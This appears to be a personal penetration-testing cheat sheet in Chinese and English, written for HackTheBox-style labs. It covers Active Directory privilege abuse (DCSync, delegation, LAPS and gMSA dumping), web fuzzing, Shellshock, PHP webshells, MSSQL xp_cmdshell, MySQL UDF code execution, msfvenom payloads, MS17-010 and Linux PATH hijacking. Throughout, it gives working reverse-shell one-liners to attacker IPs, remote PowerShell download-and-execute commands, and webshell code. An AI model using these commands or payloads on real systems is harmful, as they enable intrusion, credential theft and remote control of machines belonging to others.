修改密碼，並把使用者(herman)加入某(backup_admin)群組 ``` import-module ./PowerView.ps1 $passwd = ConvertTo-SecureString -String 'miku123$' -AsPlainText -Force $cred = New-Object System.Management.Automation.PSCredential ('HTB\Herman', $passwd) Add-DomainGroupMember -Identity 'Backup_Admins' -Members Herman -Credential $cred ``` 要重新登入才生效 ### Powerup `powershell -exec bypass -c "iex(new-object system.net.webclient).downloadstring('http://<host>/PowerUp.ps1'); invoke-AllChecks"` ------------------------------------------------ * DC Sync(Domain object) ``` $passwd = ConvertTo-SecureString -String 'miku123$' -AsPlainText -Force $cred = New-Object System.Management.Automation.PSCredential ('HTB\miku', $pass) Add-DomainObjectAcl -Credential $cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity miku -Rights DCSync * then we can use secretdumps secretsdump.py '<Domain>/<Account>:<Pasword>@<DC_IP>' ``` * delegation (computer object) ``` # -------- On Server Side # Upload tools upload /home/user/Tools/Powermad/Powermad.ps1 pm.ps1 upload /home/user/Tools/Ghostpack-CompiledBinaries/Rubeus.exe r.exe # Import PowerMad Import-Module ./pm.ps1 # Set variables Set-Variable -Name "FakePC" -Value "FAKE01" Set-Variable -Name "targetComputer" -Value "DC" # With Powermad, Add the new fake computer object to AD. New-MachineAccount -MachineAccount (Get-Variable -Name "FakePC").Value -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose # With Built-in AD modules, give the new fake computer object the Constrained Delegation privilege. Set-ADComputer (Get-Variable -Name "targetComputer").Value -PrincipalsAllowedToDelegateToAccount ((Get-Variable -Name "FakePC").Value + '$') # With Built-in AD modules, check that the last command worked. Get-ADComputer (Get-Variable -Name "targetComputer").Value -Properties PrincipalsAllowedToDelegateToAccount ``` ``` # With Rubeus, generate the new fake computer object password hashes. # Since we created the computer object with the password 123456 we will need those hashes # for the next step. ./r.exe hash /password:123456 /user:FAKE01$ /domain:support.htb ``` ``` * LAPS_Readers https://github.com/kfosaaen/Get-LAPSPasswords `Get-ADComputer DC01 -property 'ms-mcs-admpwd'` `lapsdumper -u 'svc_deploy' -p 'test' -d timelapse.htb -l 10.10.11.152` * gMSADump https://github.com/micahvandeusen/gMSADumper `python3 gMSADumper.py -u user -p password -d domain.local` ## WEB https://github.com/w181496/Web-CTF-Cheatsheet #### add DNS `vim /etc/hosts` #### ffuf https://github.com/tamimhasan404/FFUF-Tips-And-Tricks * vhost: `ffuf -c -u http://artcorp.htb -H 'Host: FUZZ.artcorp.htb' -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -mc 200` * dir: `ffuf -c -u https://seal.htb/FUZZ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -v -fc 401,403,404` * wordlist: `ffuf -w /usr/share/SecLists-master/Discovery/Web-Content/raft-large-directories.txt -u https://xyz.com/FUZZ -e .html,.php,.txt,.pdf` * recuration `/ffuf -w /usr/share/SecLists-master/Discovery/Web-Content/raft-large-directories.txt -u https://xyz.com/FUZZ -recursion-depth 2` * sub-domain `wfuzz -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.horizontall.htb" --sc 200 <IP>` * 子目錄 (這個速度快可以優先用) `ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-large-files.txt -t 100 -e php,html,txt -mc 200,302,301 -u http://<10.129.95.185>/FUZZ` #### feroxbuster `feroxbuster -u https://seal.htb -k` #### gobuster * 子目錄 `sudo gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u {URL}` * subdomain `gobuster vhost -u http://artcorp.htb -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt` #### dirbuster `dirbuster -u https://10.10.10.60 -t 20 -l /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -r sense-10.10.10.60/dirbuster_dir-med -e php,txt,html` #### dirsearch https://github.com/maurosoria/dirsearch `python3 dirsearch.py -u https://10.129.86.72` #### shell shocker cgi-bin can download sh `curl -H "user-agent: () { :; }; echo; echo; /bin/bash -i >& /dev/tcp/10.10.14.5/4444 0>&1" \ http://10.10.10.56:80/cgi-bin/user.sh` #### SSTi https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection#handlebars-nodejs #### Webshell * php ``` <?php exec("/bin/bash -c 'bash -i &> /dev/tcp/KALI_IP/4444 0<&1'") ?> <?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.154 8082 >/tmp/f"); ?> <?php echo system($_REQUEST['cmd']);?> 一句話木馬 ``` #### Curl ``` curl -i -H "User-agent: () { :;}; /bin/bash -i >& /dev/tcp/10.10.14.20/4444 0>&1" http://10.129.96.97/cgi-bin/user.sh ``` #### Wpscan `wpscan --url http://192.168.1.86` #### sslscan `sslscan <IP>`確認SSL TLS 版本 `nano /etc/ssl/openssl.cnf` 配置這邊修改 #### svwar `svwar -m INVITE -e100-999 <IP>` 確認SIP版本(Elastix Payload會用到) ## database * priv ``` SELECT is_srvrolemember('sysadmin'); #check priv go next step ``` ``` EXECUTE sp_configure 'show advanced options',1; RECONFIGURE; EXECUTE sp_configure 'xp_cmdshell',1; RECONFIGURE; ``` * reverse shell ``` xp_cmdshell "powershell.exe wget http://[Your_tun0_IP]:8000/nc.exe -OutFile c:\\Users\Public\\nc.exe" xp_cmdshell "powershell -c cd c:\Users\Public\nc.exe; .\nc.exe -e cmd.exe 10.10.14.9 443" ``` * mysql RCE ``` select @@version_compile_os, @@version_compile_machine; select @@plugin_dir; show variables like 'plugin%'; select load_file('\\\\IP\\share\\lib_mysqludf_sys_64.dll') into dumpfile "C:\\xampp\\mysql\\lib\\plugin\\udf.dll"; select sys_exec("\\\\192.168.xx.135\\share\\WinTool\\nc.exe -e C:\\Windows\\System32\\cmd.exe -nv IP PORT"); ``` ## MSF `msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.2 LPORT=4444 -f war > shell.war` `msfvenom -p windows/shell_reverse_tcp -f aspx LHOST=10.10.14.2 LPORT=4444 -o reverse-shell.aspx ` `msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.14 LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows -o rev_10.10.14.14_443.exe` Windows Reverse `msfvenom -p java/shell_reverse_tcp lhost=10.10.14.22 lport=443 -f war -o rev.war` TomCat Linux `msfvenom -p windows/shell_reverse_tcp LHOST=10.10.15.83 LPORT=9002 -f war > rev_shell-9002.war` Tomcat Windows ` msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=10.10.14.20 LPORT=443 -b '\x00\x0A\x0D' -f python -v payload` 可以做bufferoverflow使用 * ms17-010 https://github.com/helviojunior/MS17-010.git ``` msfvenom -p windows//reverse_tcp lhost=<LAB IP> lport=<PORT> -f exe > writeup.exe python2 send_and_execute.py 10.10.10.40 ../writeup.exe ``` #### MS17-010 https://github.com/helviojunior/MS17-010 https://www.cnblogs.com/mrlonely2018/p/15137143.html ``` ##usrname chang to // msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.5 LPORT=7879 -f exe > shell_reverse_tcp nc -lvnp port python2 send_and_execute.py 10.10.10.4 /home/kali/Desktop/shell_reverse_tcp #### buffe overflow https://hackercat.org/oscp/buffer-overflows-made-easy-notes-oscp-preparation ### AD Penestration #### 枚舉 ``` nltest /domain_trusts Domain "Domain"的信任清單 ``` AS-Rep | 用戶狀態| AS-REP 訊息 | | -------- | -------- | | 用戶存在且啟用 | KDC_ERR_PREAUTH_REQUEST| | 用戶存在但禁用 | KDC_ERR_CLIENT_REVOKE| | 用戶不存在 | KDC_ERR_C_PRINCIPAL_UNKNOWN| #### pfx key ``` openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out priv-key.pem -nodes openssl pkcs12 -in ./legacyy_dev_auth.pfx -out public.pem -clcerts -nokeys evil-winrm -i 10.10.11.152 -S -k priv-key.pem -c public.pem ``` * 權限修改 ``` GenericAll - full rights to the object (add users to a group or reset user's password) GenericWrite - update object's attributes (i.e logon script) WriteOwner - change object owner to attacker controlled user take over the object WriteDACL - modify object's ACEs and give attacker full control right over the object AllExtendedRights - ability to add user to a group or reset password ForceChangePassword - ability to change user's password Self (Self-Membership) - ability to add yourself to a group ``` ## Linux 提權 * 命令劫持 ``` export PATH=/home/m4lwhere:$PATH 添加環境變量 touch gzip 添加想要劫持的命令 chmod 777 gzip (添加以下這一串到gzip內) #!/bin/bash bash -p bash -i >& /dev/tcp/10.10.16.3/4242 0>&1 sudo /opt/scripts/access_backup.sh ``` ## Google Hacking ``` Filetype: <檔案> site: <github.com> intitle : "index of" "parent directory" ext: php ext: xml ``` ## SQL 使用 ### Mysql #### 登入 `mysql -u root -p'root' -h 192.168.50.16 -P 3306` #### 指令 ``` show databases; SELECT user, authentication_string FROM mysql.user WHERE user = 'offsec'; ``` ### Mssql #### 登入 `impacket-mssqlclient Administrator:Lab123@192.168.50.18 -windows-auth` ``` SELECT @@version; 確認版本 SELECT name FROM sys.databases; 確認所有DB的名稱 SELECT * FROM offsec.information_schema.tables; ```